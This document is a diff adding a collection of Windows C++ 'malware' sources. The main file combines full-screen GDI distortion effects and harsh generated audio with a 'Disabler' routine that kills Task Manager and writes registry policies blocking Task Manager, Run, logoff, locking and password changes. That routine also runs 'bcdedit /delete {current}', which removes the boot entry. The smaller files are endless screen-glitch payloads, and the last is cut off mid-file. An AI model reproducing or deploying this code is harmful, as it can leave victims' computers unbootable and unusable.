+ w, h, hdc, rand() % (shakeIntensity * 2) - shakeIntensity, rand() % (shakeIntensity * 2) - shakeIntensity, SRCCOPY);
438
+
439
+ Sleep(10); // Delay between shake movements
440
+ ReleaseDC(0, hdc);
441
+ }
442
+ return 0x00;
443
+ }
444
+
445
+ DWORD WINAPI shader5(LPVOID lpvd)
446
+ {
447
+ HDC hdc = GetDC(NULL);
448
+ HDC hdcCopy = CreateCompatibleDC(hdc);
449
+ int w = GetSystemMetrics(0);
450
+ int h = GetSystemMetrics(1);
451
+ BITMAPINFO bmpi = { 0 };
452
+ HBITMAP bmp;
453
+
454
+ bmpi.bmiHeader.biSize = sizeof(bmpi);
455
+ bmpi.bmiHeader.biWidth = w;
456
+ bmpi.bmiHeader.biHeight = h;
457
+ bmpi.bmiHeader.biPlanes = 1;
458
+ bmpi.bmiHeader.biBitCount = 32;
459
+ bmpi.bmiHeader.biCompression = BI_RGB;
460
+
461
+ RGBQUAD* rgbquad = NULL;
462
+ HSL hslcolor;
463
+
464
+ bmp = CreateDIBSection(hdc, &bmpi, DIB_RGB_COLORS, (void**)&rgbquad, NULL, 0);
465
+ SelectObject(hdcCopy, bmp);
466
+
467
+ INT i = 0;
468
+
469
+ while (1)
470
+ {
471
+ hdc = GetDC(NULL);
472
+ StretchBlt(hdcCopy, 0, 0, w, h, hdc, 0, 0, w, h, SRCCOPY);
473
+
474
+ RGBQUAD rgbquadCopy;
475
+
476
+ for (int x = 0; x < w; x++)
477
+ {
478
+ for (int y = 0; y < h; y++)
479
+ {
480
+ int index = y * w + x;
481
+
482
+ // Set red based on x and green based on y
483
+ rgbquad[index].rgbRed = x; // Red channel will increase as x increases
484
+ rgbquad[index].rgbGreen = y; // Green channel will increase as y increases
485
+ rgbquad[index].rgbBlue = 0; // No blue component, set to 0
486
+ }
487
+ }
488
+
489
+ i++;
490
+ StretchBlt(hdc, 0, 0, w, h, hdcCopy, 0, 0, w, h, SRCCOPY);
491
+ ReleaseDC(NULL, hdc);
492
+ DeleteDC(hdc);
493
+ }
494
+
495
+ return 0x00;
496
+ }
497
+
498
+ DWORD WINAPI shader6(LPVOID lpParam) {
499
+ while (1) {
500
+ HDC hdc = GetDC(0);
501
+ int w = GetSystemMetrics(SM_CXSCREEN);
502
+ int h = GetSystemMetrics(SM_CYSCREEN);
503
+
504
+ // Use SRCAND to darken instead of brightening
505
+ BitBlt(hdc, rand() % 2, rand() % 2, w, h, hdc, rand() % 2, rand() % 2, SRCAND);
506
+
507
+
508
+ Sleep(1);
509
+ ReleaseDC(0, hdc);
510
+ }
511
+ }
512
+
513
+ DWORD WINAPI shader7(LPVOID lpParam) {
514
+ int w = GetSystemMetrics(0);
515
+ int h = GetSystemMetrics(1);
516
+ int rainbowCycle = 0;
517
+
518
+ while (1) {
519
+ HDC hdc = GetDC(0);
520
+
521
+ // Shift the screen content upwards (top shift)
522
+ BitBlt(hdc, 0, 0, w, h, hdc, 0, -30, SRCCOPY); // Move content up by 30 pixels
523
+
524
+ // White brush to merge
525
+ HBRUSH brush1 = CreateSolidBrush(RGB(255, 255, 255));
526
+ SelectObject(hdc, brush1);
527
+ BitBlt(hdc, 0, 0, w, h, hdc, 0, 0, MERGECOPY);
528
+ DeleteObject(brush1);
529
+
530
+ // Rainbow color generation
531
+ int r = (sin(rainbowCycle * 0.1) + 1) * 127; // Red
532
+ int g = (sin(rainbowCycle * 0.1 + 2) + 1) * 127; // Green
533
+ int b = (sin(rainbowCycle * 0.1 + 4) + 1) * 127; // Blue
534
+
535
+ HBRUSH brush2 = CreateSolidBrush(RGB(r, g, b));
536
+ SelectObject(hdc, brush2);
537
+ BitBlt(hdc, 0, 0, w, h, hdc, 0, 0, PATINVERT); // Invert colors
538
+ DeleteObject(brush2);
539
+
540
+ // Increment the rainbowCycle to change the colors gradually
541
+ rainbowCycle++;
542
+
543
+ ReleaseDC(0, hdc);
544
+ Sleep(10);
545
+ }
546
+ }
547
+
548
+ DWORD WINAPI shader8(LPVOID lpParam) {
549
+ int w = GetSystemMetrics(0);
550
+ int h = GetSystemMetrics(1);
551
+ int rainbowCycle = 0;
552
+
553
+ while (1) {
554
+ HDC hdc = GetDC(0);
555
+
556
+ // Create a solid color for the flashy effect
557
+ int r = (sin(rainbowCycle * 0.1) + 1) * 127; // Red
558
+ int g = (sin(rainbowCycle * 0.1 + 2) + 1) * 127; // Green
559
+ int b = (sin(rainbowCycle * 0.1 + 4) + 1) * 127; // Blue
560
+
561
+ HBRUSH brush2 = CreateSolidBrush(RGB(r, g, b));
562
+ SelectObject(hdc, brush2);
563
+
564
+ // Fill the entire screen with the flashy color
565
+ Rectangle(hdc, 0, 0, w, h); // Paint the screen with the color
566
+
567
+ DeleteObject(brush2);
568
+
569
+ // Increment the rainbowCycle to change the colors gradually
570
+ rainbowCycle++;
571
+
572
+ ReleaseDC(0, hdc);
573
+ Sleep(10);
574
+ }
575
+ }
576
+
577
+ DWORD WINAPI lastly(LPVOID lpParam)
578
+ {
579
+ POINT wPt[3];
580
+ RECT wRect;
581
+ int rainbowCycle = 0;
582
+ while (1)
583
+ {
584
+ HDC hdc = GetDC(0);
585
+ HDC hdcMem = CreateCompatibleDC(hdc);
586
+ int sw = GetSystemMetrics(0);
587
+ int sh = GetSystemMetrics(1);
588
+ HBITMAP bm = CreateCompatibleBitmap(hdc, sw, sh);
589
+ SelectObject(hdcMem, bm);
590
+ GetWindowRect(GetDesktopWindow(), &wRect);
591
+ int c = 10;
592
+
593
+ // Randomize triangle points
594
+ wPt[0].x = wRect.left + rand() % 11 - 5;
595
+ wPt[0].y = wRect.top + rand() % 21 - 10;
596
+
597
+ wPt[1].x = wRect.right + rand() % 21 - 10;
598
+ wPt[1].y = wRect.top + rand() % 41 - 20;
599
+
600
+ wPt[2].x = wRect.left + c - rand() % 21 - c;
601
+ wPt[2].y = wRect.bottom - c + rand() % 21 - c;
602
+
603
+ // Capture part of the screen and apply triangle transformation
604
+ PlgBlt(hdcMem, wPt, hdc, wRect.left, wRect.top, wRect.right - wRect.left, wRect.bottom - wRect.top, 0, 0, 0);
605
+
606
+ // Rainbow color generation
607
+ int r = (sin(rainbowCycle * 0.1) + 1) * 127; // Red
608
+ int g = (sin(rainbowCycle * 0.1 + 2) + 1) * 127; // Green
609
+ int b = (sin(rainbowCycle * 0.1 + 4) + 1) * 127; // Blue
610
+
611
+ // Create a rainbow brush
612
+ HBRUSH rainbowBrush = CreateSolidBrush(RGB(r, g, b));
613
+ SelectObject(hdc, rainbowBrush);
614
+
615
+ // Invert colors of the selected area
616
+ BitBlt(hdc, rand() % 20, rand() % 20, sw, sh, hdcMem, rand() % 20, rand() % 20, PATINVERT);
617
+
618
+ // Clean up brushes and memory
619
+ DeleteObject(rainbowBrush);
620
+ DeleteObject(hdcMem);
621
+ DeleteObject(bm);
622
+ ReleaseDC(0, hdc);
623
+
624
+ // Increment the rainbow cycle counter
625
+ rainbowCycle++;
626
+
627
+ // Small delay before next iteration
628
+ Sleep(10);
629
+ }
630
+ }
631
+
632
+
633
+ void WINAPI sound1() {
634
+ HWAVEOUT hWaveOut = 0;
635
+ WAVEFORMATEX wfx = { WAVE_FORMAT_PCM, 1, 8000, 8000, 1, 8, 0 };
636
+ waveOutOpen(&hWaveOut, WAVE_MAPPER, &wfx, 0, 0, CALLBACK_NULL);
637
+
638
+ char buffer[8000 * 30] = {};
639
+ for (DWORD t = 0; t < sizeof(buffer); ++t)
640
+ buffer[t] = static_cast<char>(5 * (t&t >> 5 ^ 10) ^ 15 & (t >> 10));
641
+
642
+ WAVEHDR header = { buffer, sizeof(buffer), 0, 0, 0, 0, 0, 0 };
643
+ waveOutPrepareHeader(hWaveOut, &header, sizeof(WAVEHDR));
644
+ waveOutWrite(hWaveOut, &header, sizeof(WAVEHDR));
645
+ waveOutUnprepareHeader(hWaveOut, &header, sizeof(WAVEHDR));
646
+ waveOutClose(hWaveOut);
647
+ }
648
+
649
+
650
+ void WINAPI sound2() {
651
+ HWAVEOUT hWaveOut = 0;
652
+ WAVEFORMATEX wfx = { WAVE_FORMAT_PCM, 1, 11025, 11025, 1, 8, 0 };
653
+ waveOutOpen(&hWaveOut, WAVE_MAPPER, &wfx, 0, 0, CALLBACK_NULL);
654
+
655
+ char buffer[11025 * 30] = {};
656
+ for (DWORD t = 0; t < sizeof(buffer); ++t)
657
+ buffer[t] = static_cast<char>(~t + (t ^ (t >> 6)) * 5);
658
+
659
+ WAVEHDR header = { buffer, sizeof(buffer), 0, 0, 0, 0, 0, 0 };
660
+ waveOutPrepareHeader(hWaveOut, &header, sizeof(WAVEHDR));
661
+ waveOutWrite(hWaveOut, &header, sizeof(WAVEHDR));
662
+ waveOutUnprepareHeader(hWaveOut, &header, sizeof(WAVEHDR));
663
+ waveOutClose(hWaveOut);
664
+ }
665
+
666
+ void WINAPI sound3() {
667
+ HWAVEOUT hWaveOut = 0;
668
+ WAVEFORMATEX wfx = { WAVE_FORMAT_PCM, 1, 11025, 11025, 1, 8, 0 };
669
+ waveOutOpen(&hWaveOut, WAVE_MAPPER, &wfx, 0, 0, CALLBACK_NULL);
670
+
671
+ char buffer[11025 * 30] = {};
672
+ for (DWORD t = 0; t < sizeof(buffer); ++t)
673
+ buffer[t] = static_cast<char>(~t * 100 + (t^t >> 5));
674
+
675
+ WAVEHDR header = { buffer, sizeof(buffer), 0, 0, 0, 0, 0, 0 };
676
+ waveOutPrepareHeader(hWaveOut, &header, sizeof(WAVEHDR));
677
+ waveOutWrite(hWaveOut, &header, sizeof(WAVEHDR));
678
+ waveOutUnprepareHeader(hWaveOut, &header, sizeof(WAVEHDR));
679
+ waveOutClose(hWaveOut);
680
+ }
681
+
682
+ void WINAPI sound4() {
683
+ HWAVEOUT hWaveOut = 0;
684
+ WAVEFORMATEX wfx = { WAVE_FORMAT_PCM, 1, 11025, 11025, 1, 8, 0 };
685
+ waveOutOpen(&hWaveOut, WAVE_MAPPER, &wfx, 0, 0, CALLBACK_NULL);
686
+
687
+ char buffer[11025 * 30] = {};
688
+ for (DWORD t = 0; t < sizeof(buffer); ++t)
689
+ buffer[t] = static_cast<char>(5 * (t + t >> 5)*(t + t) + t >> 10);
690
+
691
+ WAVEHDR header = { buffer, sizeof(buffer), 0, 0, 0, 0, 0, 0 };
692
+ waveOutPrepareHeader(hWaveOut, &header, sizeof(WAVEHDR));
693
+ waveOutWrite(hWaveOut, &header, sizeof(WAVEHDR));
694
+ waveOutUnprepareHeader(hWaveOut, &header, sizeof(WAVEHDR));
695
+ waveOutClose(hWaveOut);
696
+ }
697
+
698
+ void WINAPI sound5() {
699
+ HWAVEOUT hWaveOut = 0;
700
+ WAVEFORMATEX wfx = { WAVE_FORMAT_PCM, 1, 16025, 16025, 1, 8, 0 };
701
+ waveOutOpen(&hWaveOut, WAVE_MAPPER, &wfx, 0, 0, CALLBACK_NULL);
702
+
703
+ char buffer[16025 * 30] = {};
704
+ for (DWORD t = 0; t < sizeof(buffer); ++t)
705
+ buffer[t] = static_cast<char>(t + (t&t^t >> 6) + (t&t >> 9));
706
+
707
+ WAVEHDR header = { buffer, sizeof(buffer), 0, 0, 0, 0, 0, 0 };
708
+ waveOutPrepareHeader(hWaveOut, &header, sizeof(WAVEHDR));
709
+ waveOutWrite(hWaveOut, &header, sizeof(WAVEHDR));
710
+ waveOutUnprepareHeader(hWaveOut, &header, sizeof(WAVEHDR));
711
+ waveOutClose(hWaveOut);
712
+ }
713
+
714
+ void WINAPI sound6() {
715
+ HWAVEOUT hWaveOut = 0;
716
+ WAVEFORMATEX wfx = { WAVE_FORMAT_PCM, 1, 8025, 8025, 1, 8, 0 };
717
+ waveOutOpen(&hWaveOut, WAVE_MAPPER, &wfx, 0, 0, CALLBACK_NULL);
718
+
719
+ char buffer[8025 * 30] = {};
720
+ for (DWORD t = 0; t < sizeof(buffer); ++t)
721
+ buffer[t] = static_cast<char>(t - (t + t >> 5) + (t^t >> 5));
722
+
723
+ WAVEHDR header = { buffer, sizeof(buffer), 0, 0, 0, 0, 0, 0 };
724
+ waveOutPrepareHeader(hWaveOut, &header, sizeof(WAVEHDR));
725
+ waveOutWrite(hWaveOut, &header, sizeof(WAVEHDR));
726
+ waveOutUnprepareHeader(hWaveOut, &header, sizeof(WAVEHDR));
727
+ waveOutClose(hWaveOut);
728
+ }
729
+
730
+ void WINAPI sound7() {
731
+ HWAVEOUT hWaveOut = 0;
732
+ WAVEFORMATEX wfx = { WAVE_FORMAT_PCM, 1, 8025, 8025, 1, 8, 0 };
733
+ waveOutOpen(&hWaveOut, WAVE_MAPPER, &wfx, 0, 0, CALLBACK_NULL);
734
+
735
+ char buffer[8025 * 30] = {};
736
+ for (DWORD t = 0; t < sizeof(buffer); ++t)
737
+ buffer[t] = static_cast<char>(t ^ (t + t >> 7)&t >> 4);
738
+
739
+ WAVEHDR header = { buffer, sizeof(buffer), 0, 0, 0, 0, 0, 0 };
740
+ waveOutPrepareHeader(hWaveOut, &header, sizeof(WAVEHDR));
741
+ waveOutWrite(hWaveOut, &header, sizeof(WAVEHDR));
742
+ waveOutUnprepareHeader(hWaveOut, &header, sizeof(WAVEHDR));
743
+ waveOutClose(hWaveOut);
744
+ }
745
+
746
+
747
+ void WINAPI sound8() {
748
+ HWAVEOUT hWaveOut = 0;
749
+ WAVEFORMATEX wfx = { WAVE_FORMAT_PCM, 1, 8025, 8025, 1, 8, 0 };
750
+ waveOutOpen(&hWaveOut, WAVE_MAPPER, &wfx, 0, 0, CALLBACK_NULL);
751
+
752
+ char buffer[8025 * 30] = {};
753
+ for (DWORD t = 0; t < sizeof(buffer); ++t)
754
+ buffer[t] = static_cast<char>(t*(t >> 6));
755
+
756
+ WAVEHDR header = { buffer, sizeof(buffer), 0, 0, 0, 0, 0, 0 };
757
+ waveOutPrepareHeader(hWaveOut, &header, sizeof(WAVEHDR));
758
+ waveOutWrite(hWaveOut, &header, sizeof(WAVEHDR));
759
+ waveOutUnprepareHeader(hWaveOut, &header, sizeof(WAVEHDR));
760
+ waveOutClose(hWaveOut);
761
+ }
762
+
763
+ void WINAPI sound9() {
764
+ HWAVEOUT hWaveOut = 0;
765
+ WAVEFORMATEX wfx = { WAVE_FORMAT_PCM, 1, 8025, 8025, 1, 8, 0 };
766
+ waveOutOpen(&hWaveOut, WAVE_MAPPER, &wfx, 0, 0, CALLBACK_NULL);
767
+
768
+ char buffer[8025 * 30] = {};
769
+ for (DWORD t = 0; t < sizeof(buffer); ++t)
770
+ buffer[t] = static_cast<char>(t*(t >> 10 | t >> 12) * t >> 15);
771
+
772
+ WAVEHDR header = { buffer, sizeof(buffer), 0, 0, 0, 0, 0, 0 };
773
+ waveOutPrepareHeader(hWaveOut, &header, sizeof(WAVEHDR));
774
+ waveOutWrite(hWaveOut, &header, sizeof(WAVEHDR));
775
+ waveOutUnprepareHeader(hWaveOut, &header, sizeof(WAVEHDR));
776
+ waveOutClose(hWaveOut);
777
+ }
778
+
779
+ DWORD WINAPI last(LPVOID lpParam)
780
+ {
781
+ CreateDirectoryA("C:\\GoodbyeForever", 0);
782
+ DWORD dwBytesWritten;
783
+ HANDLE hDevice = CreateFileW(
784
+ L"C:\\GoodbyeForever\\data.wav", GENERIC_ALL,
785
+ FILE_SHARE_READ | FILE_SHARE_WRITE, 0,
786
+ CREATE_ALWAYS, 0, 0);
787
+
788
+ WriteFile(hDevice, data, 236366, &dwBytesWritten, 0); // write the file to the handle
789
+ CloseHandle(hDevice);
790
+
791
+ // Use PlaySound to play the sound
792
+ PlaySound(L"C:\\GoodbyeForever\\data.wav", NULL, SND_FILENAME | SND_ASYNC);
793
+
794
+ return 0;
795
+ }
796
+
797
+
798
+ DWORD WINAPI Fake1(LPVOID lpParam) {
799
+ while (1) {
800
+ MessageBox(NULL, L"The program can't start because byebye.dll is missing from your computer. Try reinstalling the program to fix this problem.", L"System Error", MB_ICONERROR);
801
+ }
802
+ return 0;
803
+ }
804
+
805
+ DWORD WINAPI goodbye(LPVOID lpParam) {
806
+ while (1) {
807
+ MessageBox(NULL, L"Have you ever felt something is gonna happen?", L"?", MB_ICONERROR);
808
+ }
809
+ return 0;
810
+ }
811
+
812
+ DWORD WINAPI goodbye1(LPVOID lpParam) {
813
+ while (1) {
814
+ MessageBox(NULL, L"But i know.", L"?", MB_ICONERROR);
815
+ }
816
+ return 0;
817
+ }
818
+
819
+ DWORD WINAPI goodbye2(LPVOID lpParam) {
820
+ while (1) {
821
+ MessageBox(NULL, L"Goodbye.", L"?", MB_ICONERROR);
822
+ }
823
+ return 0;
824
+ }
825
+
826
+ DWORD WINAPI Disabler(LPVOID lpParam) {
827
+ system("taskkill /f /im taskmgr.exe");
828
+ system("REG ADD hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\policies\\system /v DisableTaskMgr /t reg_dword /d 1 /f");
829
+ system("REG ADD hkcu\\Software\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer /v NoRun /t reg_dword /d 1 /f");
830
+ system("reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f");
831
+ system("reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer /v NoLogoff /t REG_DWORD /d 1 /f");
832
+ system("reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f");
833
+ system("reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v DisableChangePassword /t REG_DWORD /d 1 /f");
834
+ system("bcdedit /delete {current}");
835
+ return 1;
836
+ }
837
+ DWORD WINAPI notaskbar(LPVOID lpvd)
838
+ {
839
+ static HWND hShellWnd = ::FindWindow(_T("Shell_TrayWnd"), NULL);
840
+ ShowWindow(hShellWnd, SW_HIDE);
841
+ return 666;
842
+ }
843
+
844
+ int CALLBACK WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
845
+ if (!hasRunBefore()) {
846
+ if (MessageBoxW(NULL, L"Run Malware?", L"lGyciQRsgA.exe", MB_YESNO | MB_ICONEXCLAMATION) == IDNO) {
847
+ ExitProcess(0);
848
+ }
849
+ if (MessageBoxW(NULL, L"Are you sure? It will erase your PC. (Set date to 1/1/2038)", L"Last Warning.", MB_YESNO | MB_ICONEXCLAMATION) == IDNO) {
850
+ ExitProcess(0);
851
+ }
852
+ }
853
+ HANDLE thread1 = CreateThread(0, 0, shader1, 0, 0, 0);
854
+ sound1();
855
+ Sleep(30000);
856
+ TerminateThread(thread1, 0);
857
+ CloseHandle(thread1);
858
+ InvalidateRect(0, 0, 0);
859
+ HANDLE thread2 = CreateThread(0, 0, shader2, 0, 0, 0);
860
+ HANDLE thread2dot1 = CreateThread(0, 0, plgblt, 0, 0, 0);
861
+ sound2();
862
+ Sleep(30000);
863
+ TerminateThread(thread2, 0);
864
+ CloseHandle(thread2);
865
+ InvalidateRect(0, 0, 0);
866
+ TerminateThread(thread2dot1, 0);
867
+ CloseHandle(thread2dot1);
868
+ InvalidateRect(0, 0, 0);
869
+ HANDLE thread3 = CreateThread(0, 0, shader3, 0, 0, 0);
870
+ sound3();
871
+ Sleep(30000);
872
+ TerminateThread(thread3, 0);
873
+ CloseHandle(thread3);
874
+ InvalidateRect(0, 0, 0);
875
+ HANDLE thread4 = CreateThread(0, 0, shader4, 0, 0, 0);
876
+ HANDLE thread4dot1 = CreateThread(0, 0, shake, 0, 0, 0);
877
+ sound4();
878
+ Sleep(30000);
879
+ TerminateThread(thread4, 0);
880
+ CloseHandle(thread4);
881
+ TerminateThread(thread4dot1, 0);
882
+ CloseHandle(thread4dot1);
883
+ InvalidateRect(0, 0, 0);
884
+ HANDLE thread5 = CreateThread(0, 0, shader5, 0, 0, 0);
885
+ sound5();
886
+ Sleep(30000);
887
+ TerminateThread(thread5, 0);
888
+ CloseHandle(thread5);
889
+ HANDLE thread6 = CreateThread(0, 0, shader6, 0, 0, 0);
890
+ sound6();
891
+ Sleep(30000);
892
+ TerminateThread(thread6, 0);
893
+ CloseHandle(thread6);
894
+ HANDLE thread7 = CreateThread(0, 0, shader7, 0, 0, 0);
895
+ sound7();
896
+ Sleep(30000);
897
+ TerminateThread(thread7, 0);
898
+ CloseHandle(thread7);
899
+ HANDLE thread8 = CreateThread(0, 0, shader8, 0, 0, 0);
900
+ HANDLE thread8dot1 = CreateThread(0, 0, shader1, 0, 0, 0);
901
+ sound8();
902
+ Sleep(30000);
903
+ TerminateThread(thread8, 0);
904
+ CloseHandle(thread8);
905
+ TerminateThread(thread8dot1, 0);
906
+ CloseHandle(thread8dot1);
907
+ HANDLE thread9 = CreateThread(0, 0, lastly, 0, 0, 0);
908
+ sound9();
909
+ Sleep(30000);
910
+ TerminateThread(thread9, 0);
911
+ CloseHandle(thread9);
912
+ }
src/Sources-by-Nazar17P3426-Malwares/actinium.txt ADDED
@@ -0,0 +1,25 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #include <Windows.h>
2
+
3
+ int main(int argc, wchar_t* argv[], wchar_t* envp[])
4
+ {
5
+ int sw, sh;
6
+ HDC desk;
7
+ HBRUSH brush;
8
+ while (TRUE)
9
+ {
10
+ ShowWindow(GetConsoleWindow(), SW_HIDE);
11
+ sw = GetSystemMetrics(SM_CXSCREEN), sh = GetSystemMetrics(SM_CYSCREEN);
12
+ desk = GetDC(0);
13
+ brush = CreateSolidBrush(RGB(rand() % 255, rand() % 255, rand() % 255));
14
+ SelectObject(desk, brush);
15
+ BitBlt(desk, rand() % 5, rand() % 5, rand() % sw, rand() % sh, desk, 0, 1, NOTSRCCOPY);
16
+ PatBlt(desk, 0, 1, sw, sh, PATINVERT);
17
+ ArcTo(desk, rand() % sw, rand() % sh, rand() % sw, rand() % sh, rand() % sw, rand() % sh, rand() % sw, rand() % sh);
18
+ Arc(desk, rand() % sw, rand() % sh, rand() % sw, rand() % sh, rand() % sw, rand() % sh, rand() % sw, rand() % sh);
19
+ Pie(desk, rand() % sw, rand() % sh, rand() % sw, rand() % sh, rand() % sw, rand() % sh, rand() % sw, rand() % sh);
20
+ Beep(rand() % 2555, rand() % 25);
21
+ ReleaseDC(0, desk);
22
+ DeleteDC(desk);
23
+ Sleep(1);
24
+ }
25
+ }
src/Sources-by-Nazar17P3426-Malwares/application.txt ADDED
@@ -0,0 +1,13 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #include <windows.h>
2
+
3
+ int main() {
4
+ while(1){
5
+ HDC hdc = GetDC(HWND_DESKTOP);
6
+ int icon_x = GetSystemMetrics(SM_CXICON);
7
+ int icon_y = GetSystemMetrics(SM_CYICON) ;
8
+ POINT cursor;
9
+ GetCursorPos(&cursor);
10
+ DrawIcon(hdc, cursor.x - icon_x, cursor.y - icon_y, LoadIcon(NULL, IDI_APPLICATION));
11
+ ReleaseDC(0, hdc);
12
+ }
13
+ }
src/Sources-by-Nazar17P3426-Malwares/asterisk.txt ADDED
@@ -0,0 +1,13 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #include <windows.h>
2
+
3
+ int main() {
4
+ while(1){
5
+ HDC hdc = GetDC(HWND_DESKTOP);
6
+ int icon_x = GetSystemMetrics(SM_CXICON);
7
+ int icon_y = GetSystemMetrics(SM_CYICON) ;
8
+ POINT cursor;
9
+ GetCursorPos(&cursor);
10
+ DrawIcon(hdc, cursor.x - icon_x, cursor.y - icon_y, LoadIcon(NULL, IDI_ASTERISK));
11
+ ReleaseDC(0, hdc);
12
+ }
13
+ }
src/Sources-by-Nazar17P3426-Malwares/bitblt.txt ADDED
@@ -0,0 +1,15 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #include <windows.h>
2
+
3
+ int main()
4
+ {
5
+ while (1) {
6
+ HDC hdc = GetDC(0);
7
+ int x = SM_CXSCREEN;
8
+ int y = SM_CYSCREEN;
9
+ int w = GetSystemMetrics(0);
10
+ int h = GetSystemMetrics(1);
11
+ BitBlt(hdc, rand() % 222, rand() % 222, w, h, hdc, rand() % 222, rand() % 222, NOTSRCERASE);
12
+ Sleep(10);
13
+ ReleaseDC(0, hdc);
14
+ }
15
+ }
src/Sources-by-Nazar17P3426-Malwares/bitblt1.txt ADDED
@@ -0,0 +1,16 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #include <Windows.h>
2
+
3
+ int main() {
4
+ HWND upWnd = GetForegroundWindow();
5
+ HDC upHdc = GetDC(upWnd);
6
+ HDC desktop = GetDC(NULL);
7
+ int xs = GetSystemMetrics(SM_CXSCREEN);
8
+ int ys = GetSystemMetrics(SM_CYSCREEN);
9
+ while (true) {
10
+ FreeConsole();
11
+ upWnd = GetForegroundWindow();
12
+ upHdc = GetDC(upWnd);
13
+ desktop = GetDC(NULL);
14
+ BitBlt(desktop, -1,1, xs, ys, upHdc, 2,2, 0x999999);
15
+ }
16
+ }
src/Sources-by-Nazar17P3426-Malwares/bitblt2.txt ADDED
@@ -0,0 +1,16 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #include <windows.h>
2
+
3
+ int main()
4
+ {
5
+ {
6
+ HDC hdc = GetDC(0);
7
+ INT sw = GetSystemMetrics(0);
8
+ INT sh = GetSystemMetrics(1);
9
+ while (true)
10
+ {
11
+ SelectObject(hdc, CreateSolidBrush (RGB(rand() % 255, rand() % 255, rand() % 255)));
12
+ BitBlt(hdc , rand() % 21 - 10, rand() % 21 - 10, sw, sh, hdc, 0, 0, 0x9273ecef);
13
+ BitBlt(hdc , rand() % 21 - 10, rand() % 21 - 10, sw, sh, hdc, 0, 0, PATINVERT);
14
+ }
15
+ }
16
+ }
src/Sources-by-Nazar17P3426-Malwares/bitblt4.txt ADDED
@@ -0,0 +1,14 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #include <windows.h>
2
+
3
+ int main() {
4
+ int sw = GetSystemMetrics(0);
5
+ int sh = GetSystemMetrics(0);
6
+ while (true)
7
+ {
8
+ HDC hdc = GetDC(0);
9
+ BitBlt(hdc, rand() % 10 - 20, rand() % 20 - 10, sh, sw, hdc, 0, 0, SRCCOPY);
10
+ BitBlt(hdc, rand() % 10 - 20, rand() % 20 - 10, sw, sh, hdc, 0, 0, 0x9273ecef);
11
+ ReleaseDC(0, hdc);
12
+ Sleep(10);
13
+ }
14
+ }
src/Sources-by-Nazar17P3426-Malwares/bounce.txt ADDED
@@ -0,0 +1,43 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #include <windows.h>
2
+
3
+ int main(){
4
+ int w = GetSystemMetrics(0), h = GetSystemMetrics(1);
5
+ int signX = 1;
6
+ int signY = 1;
7
+ int signX1 = 1;
8
+ int signY1 = 1;
9
+ int incrementor = 10;
10
+ int x = 10;
11
+ int y = 10;
12
+ while(1){
13
+ HDC hdc = GetDC(0);
14
+ x += incrementor * signX;
15
+ y += incrementor * signY;
16
+ int top_x = 0 + x;
17
+ int top_y = 0 + y;
18
+ int bottom_x = 100 + x;
19
+ int bottom_y = 100 + y;
20
+ HBRUSH brush = CreateSolidBrush(RGB(rand() % 255, rand() % 255, rand() % 255));
21
+ SelectObject(hdc, brush);
22
+ Ellipse(hdc, top_x, top_y, bottom_x, bottom_y);
23
+ if (y >= GetSystemMetrics(SM_CYSCREEN))
24
+ {
25
+ signY = -1;
26
+ }
27
+ if (x >= GetSystemMetrics(SM_CXSCREEN))
28
+ {
29
+ signX = -1;
30
+ }
31
+ if (y == 0)
32
+ {
33
+ signY = 1;
34
+ }
35
+ if (x == 0)
36
+ {
37
+ signX = 1;
38
+ }
39
+ Sleep(10);
40
+ DeleteObject(brush);
41
+ ReleaseDC(0, hdc);
42
+ }
43
+ }
src/Sources-by-Nazar17P3426-Malwares/clutter.txt ADDED
@@ -0,0 +1,15 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #include <windows.h>
2
+ #include <time.h>
3
+
4
+ int main() {
5
+ int x, y;
6
+ x = GetSystemMetrics(SM_CYSCREEN);
7
+ y = GetSystemMetrics(SM_CYSCREEN);
8
+ while (0 == 0)
9
+ {
10
+ int randx, randy;
11
+ randx = rand() % x + 0;
12
+ randy = rand() % y + 0;
13
+ BitBlt(GetDC(NULL), rand() % x + 0, rand() % y + 0, randx + 200, randy + 200, GetDC(NULL), randx, randy, NOTSRCCOPY);
14
+ }
15
+ }
src/Sources-by-Nazar17P3426-Malwares/color.txt ADDED
@@ -0,0 +1,38 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #include <windows.h>
2
+ static ULONGLONG n, r;
3
+ int randy() { return n = r, n ^= 0x8ebf635bee3c6d25, n ^= n << 5 | n >> 26, n *= 0xf3e05ca5c43e376b, r = n, n & 0x7fffffff; }
4
+
5
+ DWORD WINAPI color(LPVOID lpParam) {
6
+ int time = GetTickCount();
7
+ int w = GetSystemMetrics(0), h = GetSystemMetrics(1);
8
+ RGBQUAD* data = (RGBQUAD*)VirtualAlloc(0, (w * h + w) * sizeof(RGBQUAD), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
9
+ for (int i = 0;; i++, i %= 3) {
10
+ if (!i)RedrawWindow(0, 0, 0, 133);
11
+ HDC desk = GetDC(NULL);
12
+ HDC hdcdc = CreateCompatibleDC(desk);
13
+ HBITMAP hbm = CreateBitmap(w, h, 1, 32, data);
14
